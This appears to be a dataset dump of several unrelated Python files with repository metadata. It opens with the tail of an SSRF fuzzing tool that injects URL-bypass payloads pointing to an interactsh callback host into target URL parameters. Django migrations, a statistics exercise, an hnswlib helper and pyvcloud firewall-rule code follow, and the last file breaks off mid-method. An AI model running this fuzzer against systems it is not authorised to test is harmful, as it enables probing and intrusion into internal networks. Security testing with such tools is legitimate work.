os.system(f"interactsh-client -pi 1 &> output/threadsLogs/interaction-logs{id}.txt &")
time.sleep(2)
interactionServer = None
while not interactionServer:
interactionLogs = open(f"output/threadsLogs/interaction-logs{id}.txt", "r")
fileContent = interactionLogs.read()
pastInteractionLogsSize = len(fileContent)
interactionServer = regex.search(extractInteractionServerURL, fileContent)
time.sleep(2)
interactionServer = interactionServer.group()
return interactionServer, id
def exception_verbose_message(exceptionType):
if args.verbose:
if exceptionType == "timeout":
print("\nTimeout detected... URL skipped")
elif exceptionType == "redirects":
print("\nToo many redirects... URL skipped")
elif exceptionType == "others":
print("\nRequest error... URL skipped")
def splitURLS(threadsSize):
splitted = []
URLSsize = len(allURLs)
width = int(URLSsize/threadsSize)
if width == 0:
width = 1
endVal = 0
i = 0
while endVal != URLSsize:
if URLSsize <= i + 2 * width:
if len(splitted) == threadsSize - 2:
endVal = int(i + (URLSsize - i)/2)
else:
endVal = URLSsize
else:
endVal = i + width
splitted.append(allURLs[i: endVal])
i += width
return splitted
def generatePayloads(whitelistedHost, interactionHost):
generated =[
f"http://{interactionHost}",
f"//{interactionHost}",
f"http://{whitelistedHost}.{interactionHost}",
f"http://{interactionHost}?{whitelistedHost}",
f"http://{interactionHost}/{whitelistedHost}",
f"http://{interactionHost}%ff@{whitelistedHost}",
f"http://{interactionHost}%ff.{whitelistedHost}",
f"http://{whitelistedHost}%25253F@{interactionHost}",
f"http://{whitelistedHost}%253F@{interactionHost}",
f"http://{whitelistedHost}%3F@{interactionHost}",
f"http://{whitelistedHost}@{interactionHost}",
f"http://foo@{interactionHost}:80@{whitelistedHost}",
f"http://foo@{interactionHost}%20@{whitelistedHost}",
f"http://foo@{interactionHost}%09@{whitelistedHost}"
]
return generated
def smart_extract_host(url, matchedElement):
urlDecodedElem = requests.utils.unquote(matchedElement)
hostExtractorRegex = '(?<=(https|http):\/\/)(.*?)(?=\/)'
extractedHost = regex.search(hostExtractorRegex, urlDecodedElem)
if not extractedHost:
extractedHost = regex.search(hostExtractorRegex, url)
return extractedHost.group()
def prepare_url_with_regex(url):
replacedURL = regexParams.sub(FUZZ_PLACE_HOLDER, url)
matchedElem = regexParams.search(url)
if matchedElem:
matchedElem = matchedElem.group()
return replacedURL, matchedElem
def fuzz_SSRF(url, interactionServer, fileID):
pastInteractionLogsSize = getFileSize(fileID)
replacedURL, matchedElem = prepare_url_with_regex(url)
if not matchedElem:
return
if args.oneshot:
payloadsList = [f"http://{interactionServer}"]
else:
host = smart_extract_host(url, matchedElem)
payloadsList = generatePayloads(host, interactionServer)
if args.verbose:
if not args.threads:
print(f" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +")
print(f"\nStarting fuzzing {replacedURL}")
for payload in payloadsList:
fuzz_and_detect_with_payload("FUZZ", replacedURL, payload, fileID)
time.sleep(2)
if isInteractionDetected(pastInteractionLogsSize, fileID):
if args.verbose:
print(f"\nSSRF identified in {replacedURL}. Determining valid payload ...")
for payload in payloadsList:
if fuzz_and_detect_with_payload("DETECT", replacedURL, payload, fileID):
print(f"SSRF detected in {replacedURL} with payload {payload}.")
with LOCK:
outputFile.write(f"SSRF detected in {replacedURL} with payload {payload}\n")
return
else:
if args.verbose:
print(f"\nNothing detected for {replacedURL}")
def fuzz_and_detect_with_payload(type ,url, payload, fileID):
pastInteractionLogsSize = getFileSize(fileID)
fuzzedUrl = url.replace(FUZZ_PLACE_HOLDER, payload)
if args.verbose:
if not args.threads:
print(f"Testing payload: {payload} ", end="\r")
requests.get(fuzzedUrl, timeout=TIMEOUT_DELAY)
if type == "DETECT":
time.sleep(2)
return isInteractionDetected(pastInteractionLogsSize, fileID)
def isInteractionDetected(pastInteractionLogsSize, fileID):
currentInteractionLogsSize = getFileSize(fileID)
if currentInteractionLogsSize != pastInteractionLogsSize:
return True
return False
def sequential_url_scan(urlList):
interactionServer, fileID = getInteractionServer()
for url in urlList:
try:
fuzz_SSRF(url, interactionServer, fileID)
except requests.exceptions.Timeout:
exception_verbose_message("timeout")
except requests.exceptions.TooManyRedirects:
exception_verbose_message("redirects")
except Exception as e:
print(f"{url} : {e}")
exception_verbose_message("others")
def main():
if args.url:
try:
sequential_url_scan([args.url])
except Exception as e:
print("\nInvalid URL")
elif args.file:
if not args.threads or args.threads == 1:
sequential_url_scan(allURLs)
else:
workingThreads = []
split = splitURLS(args.threads)
for subList in split:
t = threading.Thread(target=sequential_url_scan, args=[subList])
t.start()
workingThreads.append(t)
for thread in workingThreads:
thread.join()
outputFile.close()
if __name__ == '__main__':
main()
| true
| true
|
f70b4fbb627ce25c7b6702ad09dd5c7ee15dad9d
| 321
|
py
|
Python
|
core/migrations/0004_remove_user_username.py
|
jamesseth/Universalone
|
11aa4eef9879970baa49f5602d8ebdf83aee4b6a
|
[
"MIT"
] | null | null | null |
core/migrations/0004_remove_user_username.py
|
jamesseth/Universalone
|
11aa4eef9879970baa49f5602d8ebdf83aee4b6a
|
[
"MIT"
] | null | null | null |
core/migrations/0004_remove_user_username.py
|
jamesseth/Universalone
|
11aa4eef9879970baa49f5602d8ebdf83aee4b6a
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.14 on 2022-03-04 18:39
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0003_user_username'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='username',
),
]
| 17.833333
| 48
| 0.582555
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0003_user_username'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='username',
),
]
| true
| true
|
f70b50ce14fd613d55f97a8be1d77a76ed98e10a
| 1,998
|
py
|
Python
|
src/import_pracownikow/migrations/0002_importpracownikowrow.py
|
iplweb/django-bpp
|
85f183a99d8d5027ae4772efac1e4a9f21675849
|
[
"BSD-3-Clause"
] | 1
|
2017-04-27T19:50:02.000Z
|
2017-04-27T19:50:02.000Z
|
src/import_pracownikow/migrations/0002_importpracownikowrow.py
|
mpasternak/django-bpp
|
434338821d5ad1aaee598f6327151aba0af66f5e
|
[
"BSD-3-Clause"
] | 41
|
2019-11-07T00:07:02.000Z
|
2022-02-27T22:09:39.000Z
|
src/import_pracownikow/migrations/0002_importpracownikowrow.py
|
iplweb/bpp
|
f027415cc3faf1ca79082bf7bacd4be35b1a6fdf
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 3.0.11 on 2021-02-28 16:39
import django.contrib.postgres.fields.jsonb
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("bpp", "0240_auto_20210228_1739"),
("import_pracownikow", "0001_initial"),
]
operations = [
migrations.CreateModel(
name="ImportPracownikowRow",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("wiersz_xls", models.PositiveSmallIntegerField()),
(
"dane_z_xls",
django.contrib.postgres.fields.jsonb.JSONField(
blank=True, null=True
),
),
(
"autor",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="bpp.Autor"
),
),
(
"autor_jednostka",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="bpp.Autor_Jednostka",
),
),
(
"jednostka",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="bpp.Jednostka"
),
),
(
"parent",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="import_pracownikow.ImportPracownikow",
),
),
],
),
]
| 31.21875
| 87
| 0.407407
|
import django.contrib.postgres.fields.jsonb
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("bpp", "0240_auto_20210228_1739"),
("import_pracownikow", "0001_initial"),
]
operations = [
migrations.CreateModel(
name="ImportPracownikowRow",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("wiersz_xls", models.PositiveSmallIntegerField()),
(
"dane_z_xls",
django.contrib.postgres.fields.jsonb.JSONField(
blank=True, null=True
),
),
(
"autor",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="bpp.Autor"
),
),
(
"autor_jednostka",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="bpp.Autor_Jednostka",
),
),
(
"jednostka",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="bpp.Jednostka"
),
),
(
"parent",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="import_pracownikow.ImportPracownikow",
),
),
],
),
]
| true
| true
|
f70b522960a3a384eacd9476f9389c6890217ff6
| 970
|
py
|
Python
|
saleor/expensetypes/models.py
|
glosoftgroup/tenants
|
a6b229ad1f6d567b7078f83425a532830b71e1bb
|
[
"BSD-3-Clause"
] | 1
|
2018-05-03T06:17:02.000Z
|
2018-05-03T06:17:02.000Z
|
saleor/expensetypes/models.py
|
glosoftgroup/tenants
|
a6b229ad1f6d567b7078f83425a532830b71e1bb
|
[
"BSD-3-Clause"
] | 8
|
2018-05-07T16:42:35.000Z
|
2022-02-26T03:31:56.000Z
|
saleor/expensetypes/models.py
|
glosoftgroup/tenants
|
a6b229ad1f6d567b7078f83425a532830b71e1bb
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import unicode_literals
from django.db import models
from django.utils.translation import pgettext_lazy
from django.utils.timezone import now
class ExpenseTypes(models.Model):
name = models.CharField(
pgettext_lazy('ExpenseTypes field', 'name'), unique=True, max_length=128)
description = models.TextField(
verbose_name=pgettext_lazy('ExpenseTypes field', 'description'), blank=True, null=True)
updated_at = models.DateTimeField(
pgettext_lazy('ExpenseTypes field', 'updated at'), auto_now=True, null=True)
created = models.DateTimeField(pgettext_lazy('ExpenseTypes field', 'created'),
default=now, editable=False)
class Meta:
app_label = 'expensetypes'
verbose_name = pgettext_lazy('ExpenseType model', 'ExpenseType')
verbose_name_plural = pgettext_lazy('ExpenseTypes model', 'ExpenseTypes')
def __str__(self):
return self.name
| 32.333333
| 95
| 0.703093
|
from __future__ import unicode_literals
from django.db import models
from django.utils.translation import pgettext_lazy
from django.utils.timezone import now
class ExpenseTypes(models.Model):
name = models.CharField(
pgettext_lazy('ExpenseTypes field', 'name'), unique=True, max_length=128)
description = models.TextField(
verbose_name=pgettext_lazy('ExpenseTypes field', 'description'), blank=True, null=True)
updated_at = models.DateTimeField(
pgettext_lazy('ExpenseTypes field', 'updated at'), auto_now=True, null=True)
created = models.DateTimeField(pgettext_lazy('ExpenseTypes field', 'created'),
default=now, editable=False)
class Meta:
app_label = 'expensetypes'
verbose_name = pgettext_lazy('ExpenseType model', 'ExpenseType')
verbose_name_plural = pgettext_lazy('ExpenseTypes model', 'ExpenseTypes')
def __str__(self):
return self.name
| true
| true
|
f70b525457f87d17c8efd833276ea214c1891035
| 265
|
py
|
Python
|
10 Days of Statistics/Day 5 Poisson Distribution II.py
|
MonwarAdeeb/HackerRank-Solutions
|
571327e9688061745000ae81c5fd74ff7a2976d4
|
[
"MIT"
] | null | null | null |
10 Days of Statistics/Day 5 Poisson Distribution II.py
|
MonwarAdeeb/HackerRank-Solutions
|
571327e9688061745000ae81c5fd74ff7a2976d4
|
[
"MIT"
] | null | null | null |
10 Days of Statistics/Day 5 Poisson Distribution II.py
|
MonwarAdeeb/HackerRank-Solutions
|
571327e9688061745000ae81c5fd74ff7a2976d4
|
[
"MIT"
] | null | null | null |
# Enter your code here. Read input from STDIN. Print output to STDOUT
averageX, averageY = [float(num) for num in input().split(" ")]
CostX = 160 + 40*(averageX + averageX**2)
CostY = 128 + 40*(averageY + averageY**2)
print(round(CostX, 3))
print(round(CostY, 3))
| 33.125
| 69
| 0.686792
|
averageX, averageY = [float(num) for num in input().split(" ")]
CostX = 160 + 40*(averageX + averageX**2)
CostY = 128 + 40*(averageY + averageY**2)
print(round(CostX, 3))
print(round(CostY, 3))
| true
| true
|
f70b543d15dfc1d3ae417fb6ae739938fa4eb1f7
| 455
|
py
|
Python
|
MIPS.py
|
Stomach-ache/GLaS
|
253092cce1922711e7d9c9df601f117f3ec56e0c
|
[
"MIT"
] | null | null | null |
MIPS.py
|
Stomach-ache/GLaS
|
253092cce1922711e7d9c9df601f117f3ec56e0c
|
[
"MIT"
] | null | null | null |
MIPS.py
|
Stomach-ache/GLaS
|
253092cce1922711e7d9c9df601f117f3ec56e0c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import hnswlib
import numpy as np
def buildIndex(X):
dim = X.shape[1]
num_elements = X.shape[0]
data_labels = np.arange(num_elements)
p = hnswlib.Index(space = 'cosine', dim = dim)
p.init_index(max_elements = num_elements, ef_construction = 200, M = 16)
p.add_items(X, data_labels)
p.set_ef(5)
return p
def searchIndex(p, X, k=5):
labels, distances = p.knn_query(X, k = k)
return labels
| 22.75
| 76
| 0.643956
|
import hnswlib
import numpy as np
def buildIndex(X):
dim = X.shape[1]
num_elements = X.shape[0]
data_labels = np.arange(num_elements)
p = hnswlib.Index(space = 'cosine', dim = dim)
p.init_index(max_elements = num_elements, ef_construction = 200, M = 16)
p.add_items(X, data_labels)
p.set_ef(5)
return p
def searchIndex(p, X, k=5):
labels, distances = p.knn_query(X, k = k)
return labels
| true
| true
|
f70b548ce4f7e4c8370edd4d6309077c0b3aeee4
| 15,065
|
py
|
Python
|
pyvcloud/vcd/firewall_rule.py
|
kousgy123/pyvcloud
|
46cbac266b7db64c32ae2a9b860d2c82f4d00a36
|
[
"Apache-2.0"
] | null | null | null |
pyvcloud/vcd/firewall_rule.py
|
kousgy123/pyvcloud
|
46cbac266b7db64c32ae2a9b860d2c82f4d00a36
|
[
"Apache-2.0"
] | null | null | null |
pyvcloud/vcd/firewall_rule.py
|
kousgy123/pyvcloud
|
46cbac266b7db64c32ae2a9b860d2c82f4d00a36
|
[
"Apache-2.0"
] | null | null | null |
# VMware vCloud Director Python SDK
# Copyright (c) 2014-2019 VMware, Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pyvcloud.vcd.client import create_element
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.exceptions import InvalidParameterException
from pyvcloud.vcd.gateway import Gateway
from pyvcloud.vcd.gateway_services import GatewayServices
from pyvcloud.vcd.network_url_constants import FIREWALL_RULE_URL_TEMPLATE
from pyvcloud.vcd.network_url_constants import FIREWALL_RULES_URL_TEMPLATE
from pyvcloud.vcd.network_url_constants import FIREWALL_URL_TEMPLATE
class FirewallRule(GatewayServices):
__SOURCE = 'source'
__DESTINATION = 'destination'
__GROUP_OBJECT_LIST = [
'securitygroup', 'ipset', 'virtualmachine', 'network'
]
__VNIC_GROUP_LIST = ['gatewayinterface']
__APPLICATION = 'application'
__SERVICE = 'service'
__PROTOCOL_LIST = ['tcp', 'udp', 'icmp', 'any']
def _build_self_href(self, rule_id):
rule_href = (
self.network_url + FIREWALL_RULE_URL_TEMPLATE).format(rule_id)
self.href = rule_href
def _extract_id(self, rule_href):
rule_id_index = rule_href.index(FIREWALL_RULES_URL_TEMPLATE) + \
len(FIREWALL_RULES_URL_TEMPLATE) + 1
return rule_href[rule_id_index:]
def __config_url(self):
config_index = self.href.index(FIREWALL_URL_TEMPLATE)
return self.href[:config_index] + FIREWALL_URL_TEMPLATE
def _reload(self):
"""Reloads the resource representation of the Firewall rule."""
self.resource = \
self.client.get_resource(self.href)
def delete(self):
"""Delete a Firewall rule from gateway."""
self._get_resource()
return self.client.delete_resource(self.href)
def edit(self,
source_values=None,
destination_values=None,
services=None,
new_name=None):
"""Edit a Firewall rule.
:param list source_values: list of source values. e.g.,
[value:value_type]
:param list destination_values: list of destination values. e.g.,
[value:value_type]
:param list services: protocol to port mapping.
e.g., [{'tcp' : {'any' : any}}]
:param str new_name: new name of the firewall rule.
"""
self._get_resource()
self.validate_types(source_values, FirewallRule.__SOURCE)
self.validate_types(destination_values, FirewallRule.__DESTINATION)
firewall_rule_temp = self.resource
if source_values:
if not hasattr(firewall_rule_temp, FirewallRule.__SOURCE):
firewall_rule_temp.append(
create_element(FirewallRule.__SOURCE))
if not hasattr(firewall_rule_temp.source, 'exclude'):
firewall_rule_temp.source.append(
create_element('exclude', False))
self._populate_objects_info(firewall_rule_temp, source_values,
FirewallRule.__SOURCE)
if destination_values:
if not hasattr(firewall_rule_temp, FirewallRule.__DESTINATION):
firewall_rule_temp.append(
create_element(FirewallRule.__DESTINATION))
if not hasattr(firewall_rule_temp.destination, 'exclude'):
firewall_rule_temp.destination.append(
create_element('exclude', False))
self._populate_objects_info(firewall_rule_temp, destination_values,
FirewallRule.__DESTINATION)
if services:
if not hasattr(firewall_rule_temp, FirewallRule.__APPLICATION):
firewall_rule_temp.append(
create_element(FirewallRule.__APPLICATION))
self._populate_services(firewall_rule_temp, services)
if new_name:
firewall_rule_temp.name = new_name
self.client.put_resource(self.href, firewall_rule_temp,
EntityType.DEFAULT_CONTENT_TYPE.value)
def _populate_services(self, firewall_rule_temp, services):
"""Populates service elements.
:param firewall_rule_temp: Firewall rule
:param [] services: protocol to port mapping.
e.g., [{'tcp' : {'any' : any}}]
"""
if services:
for service in services:
protocol = [k for k in service.keys()][0]
if protocol not in FirewallRule.__PROTOCOL_LIST:
valid_protocols = ', '.join(FirewallRule.__PROTOCOL_LIST)
raise InvalidParameterException(
protocol + " is not valid. It should be from " +
valid_protocols)
value = service.get(protocol)
source_port = [port for port in value.keys()][0]
destination_port = value.get(source_port)
self.__populate_protocol_elements(firewall_rule_temp, protocol,
source_port,
destination_port)
def __populate_protocol_elements(self, firewall_rule_temp, protocol,
source_port, destination_port):
"""Populate protocol elements. It mutates the firewall rule object.
:param firewall_rule_temp: Firewall rule obj
:param protocol: protocol
:param source_port: source port
:param destination_port: destination port
"""
application_tag = firewall_rule_temp.application
service_tag = create_element('service')
service_tag.append(create_element('protocol', protocol))
service_tag.append(create_element('port', destination_port))
service_tag.append(create_element('sourcePort', source_port))
if protocol == 'icmp':
service_tag.append(create_element('icmpType', 'any'))
application_tag.append(service_tag)
def _populate_objects_info(self, firewall_rule_temp, values, type):
"""It will mutate firewall_rule_temp.
:param firewall_rule_temp: Firewall rule object resource
:param list values: list of values
:param str type: type. e.g., source, destination
"""
for value in values:
values_arr = value.split(':')
object_type = values_arr[1]
object = values_arr[0]
if type == FirewallRule.__SOURCE:
firewall_rule_temp.source.append(
self._get_group_element(type, object_type, object))
if type == FirewallRule.__DESTINATION:
firewall_rule_temp.destination.append(
self._get_group_element(type, object_type, object))
def _get_group_element(self, type, object_type, value):
"""Get group element base upon the type and object type.
:param str type: It can be source/destination
:param str object_type: Possible values for this would be
'gatewayinterface','virtualmachine','network', 'ipset',
'securitygroup', 'ip'
:param str value: value
:return: group objectified element
:rtype: :rtype: lxml.objectify.ObjectifiedElement
"""
if object_type == 'ip':
return create_element('ipAddress', value)
if object_type in FirewallRule.__GROUP_OBJECT_LIST:
return self.__find_element(type, object_type, value,
'groupingObjectId')
elif object_type in FirewallRule.__VNIC_GROUP_LIST:
return self.__find_element(type, object_type, value, 'vnicGroupId')
def __find_element(self, type, object_type, value, group_type):
"""Find element in the properties using group type.
:param str type: It can be source/destination
:param dict object_type: object types
:param str value: value
:param str group_type: group type. e.g., groupingObjectId
"""
gateway_res = Gateway(self.client, resource=self.parent)
object_list = gateway_res.list_firewall_objects(type, object_type)
for object in object_list:
if object.get('name') == value:
properties = object.get('prop')
for prop in properties:
if prop.get('name') == group_type:
return create_element(group_type, prop.get('value'))
def validate_types(self, source_types, type):
"""Validate input param for valid type.
:param list source_types: list of value:value_type. e.g.,
ExtNw:gatewayinterface
:param str type: It can be source/destination
:raise: InvalidParameterException: exception if input param is not
valid.
"""
if source_types:
valid_type_list = [
'gatewayinterface', 'virtualmachine', 'network', 'ipset',
'securitygroup', 'ip'
]
for source_type in source_types:
if source_type.lower() == 'any':
continue
source_type_arr = source_type.split(':')
if len(source_type_arr) <= 1:
raise InvalidParameterException(
type + " type should be in the format of "
"value:value_type. for ex: "
"ExtNw:gatewayinterface")
valid_type = source_type_arr[1]
if valid_type not in valid_type_list:
valid_type_list_str = ','.join(valid_type_list)
raise InvalidParameterException(
valid_type + " param is not valid. It should be "
"from " + valid_type_list_str)
def enable_disable_firewall_rule(self, is_enabled):
"""Enabled disabled firewall rule from gateway.
:param bool is_enabled: flag to enable/disable the firewall rule.
"""
current_firewall_status = self._get_resource().enabled
if is_enabled == current_firewall_status:
return
if is_enabled:
self._get_resource().enabled = True
return self.client.put_resource(
self.href, self._get_resource(),
EntityType.DEFAULT_CONTENT_TYPE.value)
else:
self._get_resource().enabled = False
return self.client.put_resource(
self.href, self._get_resource(),
EntityType.DEFAULT_CONTENT_TYPE.value)
def info_firewall_rule(self):
"""Get the details of firewall rule.
return: Dictionary having firewall rule details.
e.g.
{'Id': 196609, 'Name': 'Test rule', 'Rule type':'user',
'Enabled':'True','Logging enabled':'True','Action':'Accept'}
:rtype: Dictionary
"""
firewall_rule_info = {}
resource = self._get_resource()
firewall_rule_info['Id'] = resource.id
firewall_rule_info['Name'] = resource.name
firewall_rule_info['Rule type'] = resource.ruleType
firewall_rule_info['Enabled'] = resource.enabled
firewall_rule_info['Logging enabled'] = resource.loggingEnabled
firewall_rule_info['Action'] = resource.action
return firewall_rule_info
def list_firewall_rule_source_destination(self, type):
"""Get the list of firewall rule source/destination.
:param str type: It can be source/destination
return: dict of firewall rule's source/destination details.
e.g.
{'exclude':'True','ipAddress':['10.112.12.12','10.232.1.2'],
'vnicGroupId':['vse','external','internal','vnic-0'],
'groupingObjectId':['1f0aab71-6d11-4567-994e-2c090fea7350:ipset',
'urn:vcloud:network:3ed60402-904f-410d-913c-6da77b43a257:']
}
:rtype: dict
"""
resource = self._get_resource()
firewall_rule_source_destination = {}
if hasattr(resource, type):
if hasattr(resource[type], 'exclude'):
firewall_rule_source_destination['exclude'] = resource[
type].exclude
if hasattr(resource[type], 'vnicGroupId'):
firewall_rule_source_destination['vnicGroupId'] = [
vnicGroupId for vnicGroupId in resource[type].vnicGroupId
]
if hasattr(resource[type], 'ipAddress'):
firewall_rule_source_destination['ipAddress'] = [
ipAddress for ipAddress in resource[type].ipAddress
]
if hasattr(resource[type], 'groupingObjectId'):
firewall_rule_source_destination['groupingObjectId'] = [
groupingObjectId
for groupingObjectId in resource[type].groupingObjectId
]
return firewall_rule_source_destination
def _build_firewall_rules_href(self):
return self.network_url + FIREWALL_URL_TEMPLATE
def update_firewall_rule_sequence(self, index):
"""Change firewall rule's sequence of gateway.
:param int index: new sequence index of firewall rule.
"""
index = int(index)
gateway_res = Gateway(self.client, resource=self.parent)
firewall_rule = gateway_res.get_firewall_rules()
resource = self._get_resource()
for rule in firewall_rule.firewallRules.firewallRule:
if rule.id == resource.id:
firewall_rule.firewallRules.remove(rule)
firewall_rule.firewallRules.insert(index, rule)
break
return self.client.put_resource(self._build_firewall_rules_href(),
firewall_rule,
EntityType.DEFAULT_CONTENT_TYPE.value)
def delete_firewall_rule_source_destination(self, value, type):
"""Delete firewall rule's source/destination value of gateway.
It will delete all source/destination value of given value.
:param str value: value to remove from source/destination.
:param str type: It can be source/destination
"""
resource = self._get_resource()
if hasattr(resource, type):
for object in resource[type].iter():
if object == value:
resource[type].remove(object)
return self.client.put_resource(self.href, resource,
EntityType.DEFAULT_CONTENT_TYPE.value)
| 44.308824
| 79
| 0.62237
|
from pyvcloud.vcd.client import create_element
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.exceptions import InvalidParameterException
from pyvcloud.vcd.gateway import Gateway
from pyvcloud.vcd.gateway_services import GatewayServices
from pyvcloud.vcd.network_url_constants import FIREWALL_RULE_URL_TEMPLATE
from pyvcloud.vcd.network_url_constants import FIREWALL_RULES_URL_TEMPLATE
from pyvcloud.vcd.network_url_constants import FIREWALL_URL_TEMPLATE
class FirewallRule(GatewayServices):
__SOURCE = 'source'
__DESTINATION = 'destination'
__GROUP_OBJECT_LIST = [
'securitygroup', 'ipset', 'virtualmachine', 'network'
]
__VNIC_GROUP_LIST = ['gatewayinterface']
__APPLICATION = 'application'
__SERVICE = 'service'
__PROTOCOL_LIST = ['tcp', 'udp', 'icmp', 'any']
def _build_self_href(self, rule_id):
rule_href = (
self.network_url + FIREWALL_RULE_URL_TEMPLATE).format(rule_id)
self.href = rule_href
def _extract_id(self, rule_href):
rule_id_index = rule_href.index(FIREWALL_RULES_URL_TEMPLATE) + \
len(FIREWALL_RULES_URL_TEMPLATE) + 1
return rule_href[rule_id_index:]
def __config_url(self):
config_index = self.href.index(FIREWALL_URL_TEMPLATE)
return self.href[:config_index] + FIREWALL_URL_TEMPLATE
def _reload(self):
self.resource = \
self.client.get_resource(self.href)
def delete(self):
self._get_resource()
return self.client.delete_resource(self.href)
def edit(self,
source_values=None,
destination_values=None,
services=None,
new_name=None):
self._get_resource()
self.validate_types(source_values, FirewallRule.__SOURCE)
self.validate_types(destination_values, FirewallRule.__DESTINATION)
firewall_rule_temp = self.resource
if source_values:
if not hasattr(firewall_rule_temp, FirewallRule.__SOURCE):
firewall_rule_temp.append(
create_element(FirewallRule.__SOURCE))
if not hasattr(firewall_rule_temp.source, 'exclude'):
firewall_rule_temp.source.append(
create_element('exclude', False))
self._populate_objects_info(firewall_rule_temp, source_values,
FirewallRule.__SOURCE)
if destination_values:
if not hasattr(firewall_rule_temp, FirewallRule.__DESTINATION):
firewall_rule_temp.append(
create_element(FirewallRule.__DESTINATION))
if not hasattr(firewall_rule_temp.destination, 'exclude'):
firewall_rule_temp.destination.append(
create_element('exclude', False))
self._populate_objects_info(firewall_rule_temp, destination_values,
FirewallRule.__DESTINATION)
if services:
if not hasattr(firewall_rule_temp, FirewallRule.__APPLICATION):
firewall_rule_temp.append(
create_element(FirewallRule.__APPLICATION))
self._populate_services(firewall_rule_temp, services)
if new_name:
firewall_rule_temp.name = new_name
self.client.put_resource(self.href, firewall_rule_temp,
EntityType.DEFAULT_CONTENT_TYPE.value)
def _populate_services(self, firewall_rule_temp, services):
if services:
for service in services:
protocol = [k for k in service.keys()][0]
if protocol not in FirewallRule.__PROTOCOL_LIST:
valid_protocols = ', '.join(FirewallRule.__PROTOCOL_LIST)
raise InvalidParameterException(
protocol + " is not valid. It should be from " +
valid_protocols)
value = service.get(protocol)
source_port = [port for port in value.keys()][0]
destination_port = value.get(source_port)
self.__populate_protocol_elements(firewall_rule_temp, protocol,
source_port,
destination_port)
def __populate_protocol_elements(self, firewall_rule_temp, protocol,
source_port, destination_port):
application_tag = firewall_rule_temp.application
service_tag = create_element('service')
service_tag.append(create_element('protocol', protocol))
service_tag.append(create_element('port', destination_port))
service_tag.append(create_element('sourcePort', source_port))
if protocol == 'icmp':
service_tag.append(create_element('icmpType', 'any'))
application_tag.append(service_tag)
def _populate_objects_info(self, firewall_rule_temp, values, type):
for value in values:
values_arr = value.split(':')
object_type = values_arr[1]
object = values_arr[0]
if type == FirewallRule.__SOURCE:
firewall_rule_temp.source.append(
self._get_group_element(type, object_type, object))
if type == FirewallRule.__DESTINATION:
firewall_rule_temp.destination.append(
self._get_group_element(type, object_type, object))
def _get_group_element(self, type, object_type, value):
if object_type == 'ip':
return create_element('ipAddress', value)
if object_type in FirewallRule.__GROUP_OBJECT_LIST:
return self.__find_element(type, object_type, value,
'groupingObjectId')
elif object_type in FirewallRule.__VNIC_GROUP_LIST:
return self.__find_element(type, object_type, value, 'vnicGroupId')
def __find_element(self, type, object_type, value, group_type):
gateway_res = Gateway(self.client, resource=self.parent)
object_list = gateway_res.list_firewall_objects(type, object_type)
for object in object_list:
if object.get('name') == value:
properties = object.get('prop')
for prop in properties:
if prop.get('name') == group_type:
return create_element(group_type, prop.get('value'))
def validate_types(self, source_types, type):
if source_types:
valid_type_list = [
'gatewayinterface', 'virtualmachine', 'network', 'ipset',
'securitygroup', 'ip'
]
for source_type in source_types:
if source_type.lower() == 'any':
continue
source_type_arr = source_type.split(':')
if len(source_type_arr) <= 1:
raise InvalidParameterException(
type + " type should be in the format of "
"value:value_type. for ex: "
"ExtNw:gatewayinterface")
valid_type = source_type_arr[1]
if valid_type not in valid_type_list:
valid_type_list_str = ','.join(valid_type_list)
raise InvalidParameterException(
valid_type + " param is not valid. It should be "
"from " + valid_type_list_str)
def enable_disable_firewall_rule(self, is_enabled):
current_firewall_status = self._get_resource().enabled
if is_enabled == current_firewall_status:
return
if is_enabled:
self._get_resource().enabled = True
return self.client.put_resource(
self.href, self._get_resource(),
EntityType.DEFAULT_CONTENT_TYPE.value)
else:
self._get_resource().enabled = False
return self.client.put_resource(
self.href, self._get_resource(),
EntityType.DEFAULT_CONTENT_TYPE.value)
def info_firewall_rule(self):
firewall_rule_info = {}
resource = self._get_resource()
firewall_rule_info['Id'] = resource.id
firewall_rule_info['Name'] = resource.name
firewall_rule_info['Rule type'] = resource.ruleType
firewall_rule_info['Enabled'] = resource.enabled
firewall_rule_info['Logging enabled'] = resource.loggingEnabled
firewall_rule_info['Action'] = resource.action
return firewall_rule_info
def list_firewall_rule_source_destination(self, type):
resource = self._get_resource()
firewall_rule_source_destination = {}
if hasattr(resource, type):
if hasattr(resource[type], 'exclude'):
firewall_rule_source_destination['exclude'] = resource[
type].exclude
if hasattr(resource[type], 'vnicGroupId'):
firewall_rule_source_destination['vnicGroupId'] = [
vnicGroupId for vnicGroupId in resource[type].vnicGroupId
]
if hasattr(resource[type], 'ipAddress'):
firewall_rule_source_destination['ipAddress'] = [
ipAddress for ipAddress in resource[type].ipAddress
]
